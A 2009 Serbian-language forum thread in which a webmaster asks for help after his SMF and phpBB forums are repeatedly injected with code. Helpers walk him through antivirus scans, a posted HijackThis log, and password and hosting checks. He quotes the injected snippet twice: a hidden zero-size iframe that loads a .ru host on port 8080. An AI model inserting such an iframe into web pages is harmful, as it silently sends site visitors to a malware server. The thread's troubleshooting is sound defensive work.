Da li je na Forum SMF udario virus, spam ili nešto drugo?

Dok pokušavam da odgonetnem šta se desilo sa dva foruma (u potpisu su-da ih ne navodim opet) da li je neko imao iskustvo sa ovim. Izbacuje:
Parse error: syntax error, unexpected T_STRING in /home/koznazna/public_html/koznazna.com/forum/index.php on line 336
A u liniji 336 (kada vidim u notop..)stoji:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://testxxxx.ru:8080/index.php'; this.height='0'; this.width='0';}" >ctirxyotlkqfsayrmdypmjcdiigbkyo</iframe>

Da li je neko imao ovo ili nešto slično. Kada vidim ".ru" miriše mi na neki virus, spam ili nešto treće.


_{[Ovu poruku je menjao Dashkes dana 25.10.2009. u 23:24 GMT+1]}

"Udarilo" ga sigurno jeste nesto (na http://testxxxx.ru:8080/index.php postoji java aplikacija, nemam sada vremena da je izucim). Nadam se da stoji poslednja verzija SMF-a i neka "jaka" lozinka? :)

Da na oba pitanja. Hvala. Inace u poslednje vreme mi je na pamet stalno da li da se prebacim na PhpBB, i mislim da cu posle ovoga definitivno. Iako sam citao da je SMF puno sigurniji posle ovoga mu vise ne verujem.
Hvala Dashkes.

Jedan sam popravio, ostaje jos jedan. Nesto glasno razmisljam do sada nisam imao ovakvih problema. Pre dva dana instalirao sam sa jednog sajta u mod header....da prikazuje kursnu listu i vremensku prognozu. Moguce da je od toga. Sta mislite?

Izlozi problem na zvanicnom smf forumu, tesko da je do "core" smfa ...

---

Ok.

A mozes da pogledas i temu o iFrame napadima, mozda dobijes neku ideju kako se zastiti bez obzira na to koji CMS koristis.

Hvala

Isto se desava i kada postavim phpBB:

Da nemate Vi mozda neki trojanac na racunaru?
P.S. Promenite sve sifre na neke slozenije.

Eset NOD 32 nista nije detektovao. Ubacio Alviru Free i nasla 16 raznih gamadi. Ocistio i uspeo da vratim phpBB , naravno baza i sve prethodno otislo u 3 lepe...Sada pokusavam da makar spasim ovaj sa SMF-om ali za sada tesko ide). Sto se mene tice nikad vise ESET NOD 32. Hvala i pozdrav.

_{[Ovu poruku je menjao Goran Mijailovic dana 29.10.2009. u 20:13 GMT+1]}

Opet isto. I Avira nije odradila posao. Izgleda da ce morati deinstal WinXP.

Ne mora nikakav reinstall. To nista ne resava. Preuzmi i pokreni HiJackThis i ovde okaci njegov log kada zavrsi. Instrukcije mozes pronaci ovde.

Da probam, mada...Za nekoliko minuta cu.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:49:29 PM, on 10/30/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
D:\WINDOWS\System32\smss.exe
D:\WINDOWS\system32\winlogon.exe
D:\WINDOWS\system32\services.exe
D:\WINDOWS\system32\lsass.exe
D:\WINDOWS\system32\Ati2evxx.exe
D:\WINDOWS\system32\svchost.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\Ati2evxx.exe
D:\WINDOWS\system32\LEXBCES.EXE
D:\WINDOWS\system32\LEXPPS.EXE
D:\WINDOWS\system32\spoolsv.exe
D:\Program Files\Avira\AntiVir Desktop\sched.exe
D:\Program Files\Avira\AntiVir Desktop\avguard.exe
D:\WINDOWS\Explorer.EXE
D:\Program Files\Portrait Displays\Pivot Software\wpctrl.exe
D:\Program Files\Avira\AntiVir Desktop\avgnt.exe
D:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
D:\WINDOWS\system32\ctfmon.exe
D:\Program Files\Portrait Displays\Pivot Software\floater.exe
D:\Program Files\Bonjour\mDNSResponder.exe
D:\Program Files\Common Files\Portrait Displays\Shared\DTSRVC.exe
D:\Program Files\Java\jre6\bin\jqs.exe
D:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
D:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
D:\Program Files\Common Files\Portrait Displays\Drivers\pdisrvc.exe
D:\WINDOWS\system32\IoctlSvc.exe
D:\WINDOWS\system32\svchost.exe
D:\WINDOWS\system32\msiexec.exe
D:\Program Files\Internet Explorer\iexplore.exe
D:\Program Files\Internet Explorer\iexplore.exe
D:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - D:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - D:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - D:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [PivotSoftware] "D:\Program Files\Portrait Displays\Pivot Software\wpctrl.exe"
O4 - HKLM\..\Run: [nod32kui] "D:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "D:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [avgnt] "D:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware] "D:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" /starttray
O4 - HKCU\..\Run: [ctfmon.exe] D:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O8 - Extra context menu item: Add to AMV Convert Tool... - D:\Program Files\MP3 Player Utilities 4.00\AMVConverter\grab.html
O8 - Extra context menu item: Add to Media Manager... - D:\Program Files\MP3 Player Utilities 4.00\MediaManager\grab.html
O8 - Extra context menu item: Alexa Web Search... - http://tbar.alexa.com/9.0.0.30/contextmenu/search.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Get Alexa Data... - http://tbar.alexa.com/9.0.0.30/contextmenu/sitedata.htm
O8 - Extra context menu item: See Related Links... - http://tbar.alexa.com/9.0.0.30/contextmenu/related.htm
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/wi...t/wuweb_site.cab?1254978691265
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/mi...t/muweb_site.cab?1256698620234
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} (get_atlcom Class) - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - D:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - D:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Apache2.2 - Unknown owner - D:\Program Files\xampp\apache\bin\httpd.exe (file missing)
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - D:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - D:\WINDOWS\system32\ati2sgag.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - D:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: CiSvc - Unknown owner - D:\WINDOWS\system32\cisvc.exe (file missing)
O23 - Service: Portrait Displays Display Tune Service (DTSRVC) - Unknown owner - D:\Program Files\Common Files\Portrait Displays\Shared\DTSRVC.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - D:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Google Update Service (gupdate1ca0c97f651b3a8) (gupdate1ca0c97f651b3a8) - Unknown owner - D:\Program Files\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - D:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - D:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - D:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: MBAMService - Malwarebytes Corporation - D:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: MySQL - Unknown owner - D:\Program Files\xampp\mysql\bin\mysqld.exe (file missing)
O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - D:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - D:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Unknown owner - D:\Program Files\Eset\nod32krn.exe (file missing)
O23 - Service: Portrait Displays SDK Service (PdiService) - Portrait Displays, Inc. - D:\Program Files\Common Files\Portrait Displays\Drivers\pdisrvc.exe
O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - D:\WINDOWS\system32\IoctlSvc.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - D:\xampp\service.exe (file missing)
O24 - Desktop Component 0: (no name) - file:///D:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/01/clip_image001.jpg

--
End of file - 7504 bytes

Koliko ja mogu da vidim (nisam nesto posebno strucan u ovoj oblasti) tu je i xampp-koga ne koristim odavno, pa MySQL, Apache...Mozda ih iskljuciti iz START/RUN/MSCONFIG. Sta mislite?

Izgleda da si pomocu MBAM-a brisao neki malware i da je on trazio reboot da zavrsi uklanjanje, ali ti to nisi uradio. Zato prvo odradi to, a kao drugi korak mozes u HJT slobodno stiklirati sve stavke koje imaju "(file missing)" na kraju (koliko sam video ima ih barem 4-5), jer ionako nicemu ne sluze a sistem pokusava da ih podigne prilikom bootovanja. Ima par stvari koje su mi sumnjive, probacu da ih proverim, mada sam veceras nesto u frci pa ako ne stignem nadam se da ce neko od kolega sa foruma preuzeti dalje.

Hvala puno.
Evo sta se desava na serveru. Naravno nije free. Skeniram ih programom koji je tamo postavljen i on ne nadje nista sumnjivo. Znaci podaci koji su tu su "cisti". Na istom napravim bazu i instaliram ili phpBB ili SMF (svejedno koji) pomocu Fantastic-a. Sve prodje OK i to traje tako neko vreme. Nakon nekog vremena kada zadam browseru (bilo kojem: Opera, IE, Chome. Moz...) adresu sajta umesto strane foruma izbaci ovo:

Naravno opet ruska adresa:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iquoxxxx.ru:8080/index.php'; this.height='0'; this.width='0';}" >qrunbzhupooptjwyornlgbcyjfcxssm</iframe>

Sajtove prikazuje normalno, (u istom su folderu-direktorijumu).

Kako se resiti ovoga-jer po ovom postu ne bih rekao da je na kompu vec na serveru-mozda u nekom folderu gde su smesteni sajtovi-koji su u HTML. Ali kako onda prilikom skeniranja ne otkrije to. Moracu da vidim i sa Hosting-provajderom.


_{[Ovu poruku je menjao 1vi dana 30.10.2009. u 22:43 GMT+1]}

Ili su ti lozinke za pristup serveru slabe (tipa user:pera, password:pera), ili je tvoj hosting provajder busan, ili na tvom racunaru imas trojanca koji ti pokupi korisnicko ime i password kada ih unosis prilikom pristupanja serveru. Najlakse ces saznati ako najpre promenis password na serveru, i to pokusaj da postavis neki sto slozeniji (upotrebi i mala i velika slova i brojeve, minimalne duzine 8 karaktera). Ako se nakon promene passworda opet pojavi iframe, znaci da nije do lozinke, vec je u pitanju tvoj provajder ili tvoj racunar. Da bi proverio da li je tvoj racunar krivac, mozes pokusati sa netstat komandom - pogasis sve browsere, mail klijente, ftp klijente i slicne programe koji komuniciraju preko mreze, i odradis ono sto je napisano u ovoj temi, u citiranom delu. Ako vidis da neki proces ipak komunicira sa spoljnim svetom, eto ti moguceg trojanca. Ako ga ne nadjes, vreme je da popricas sa hosting provajderom i polako krenes da trazis drugog...

Hvala, da probam dalje. Ne verujem da je do host provajdera. Malo pre sam razgledao njihovu podrsku. Ok su i vrlo dobro zasticeni. Bice da je moja sifra preslaba, ili provaljena.